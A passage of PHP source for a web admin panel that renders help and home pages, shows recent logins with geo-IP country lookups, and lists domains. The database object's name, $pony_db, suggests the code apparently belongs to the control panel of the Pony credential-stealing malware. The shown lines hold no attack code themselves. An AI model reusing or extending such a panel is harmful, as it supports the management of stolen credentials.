1675. else if ($admin_action == 'help')
1676. {
1677. // ---------------------------------------------------------------------------------------
1678. // Help contents
1679.  
1680. $module_names = array();
1681.  
1682. foreach ($global_module_list as $module)
1683. {
1684. array_push($module_names, $module[2]);
1685. }
1686. $smarty->assign('module_names', $module_names);
1687. $smarty->display("help.tpl");
1688. }
1689. else if (strlen($admin_action) == 0)
1690. {
1691. // ---------------------------------------------------------------------------------------
1692. // Home page
1693. // Installation Check
1694. if (!install_check(false, false))
1695. {
1696. show_smarty_error($smarty, 'ERR_SRV_CONFIGURATION');
1697. echo '<div id="achtung" style="margin-bottom:20px">';
1698. install_check(true, true);
1699. echo '</div>';
1700. }
1701.  
1702. // Latest logins
1703. $latest_login_list = array();
1704. $pony_db->get_login_log($latest_login_list, 5);
1705.  
1706. foreach ($latest_login_list as $login_key=>$login_item)
1707. {
1708. $latest_login_list[$login_key]['country_code'] = geo_ip_country_code($login_item['ip']);
1709. $latest_login_list[$login_key]['country_name'] = geo_ip_country_name($login_item['ip']);
1710. }
1711.  
1712. $smarty->assign("login_list", $latest_login_list);
1713.  
1714. // Domains
1715. $domain_list = array();
1716. $pony_db->get_domains($domain_list);
1717.  
1718. smarty_assign_common_vars($smarty, $pony_db);
1719. $smarty->assign("domain_list", $domain_list);
1720.  
1721. $smarty->display("home.tpl");
1722. }
1723.  
1724. $smarty->display('footer.tpl');
1725. $smarty->unloadFilter('output', 'trimwhitespace');
1726. $smarty->display('stopwatch.tpl');